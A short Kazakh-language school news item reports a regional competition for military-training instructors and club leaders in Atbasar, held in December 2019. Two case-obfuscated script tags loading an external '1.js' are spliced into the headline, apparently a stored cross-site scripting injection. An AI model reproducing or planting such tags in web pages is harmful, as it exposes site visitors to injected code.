«Отанды қорғауға дайындаймыз» атты кәсіби шеберлік конкурсы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

07.12.2019

 

Ағымдағы жылдың 4-6 желтоқсан аралығында Атбасар қаласының № 3 орта мектебінде  Қазақстан Республикасының тәуелсіздік күніне  арналған Ақмола облысының білім беру ұйымдарының АӘД оқытушы-ұйымдастырушылары мен клуб жетекшілері  арасында   «Отанды қорғауға дайындаймыз» атты кәсіби шеберлік конкурсы өтті. Аталған конкурс мынандай жарыс түрлері бойынша өткізілді: атыс дайындығы, тактика, топография бойынша тест жүйесі, географиялық координаттарды анықтау сияқты практикалық тапсырмалар, ЖҚК плащ түрінде кию, пневматикалық винтовкадан ату, оқжатарды жабдықтау мен № 12/13 нормативтерді орындау. Аталған сайыста 31 қатысушы бақ сынап, «Айбын»  әскери-патриоттық клубының жетекшісі Сагидолда Орынбек Мамиұлы жалпы қорытынды бойынша жүлделі 2 орынға ие болды.

Просмотров: 646


Пікір қосу



Деректерді қолтаңбаға қосу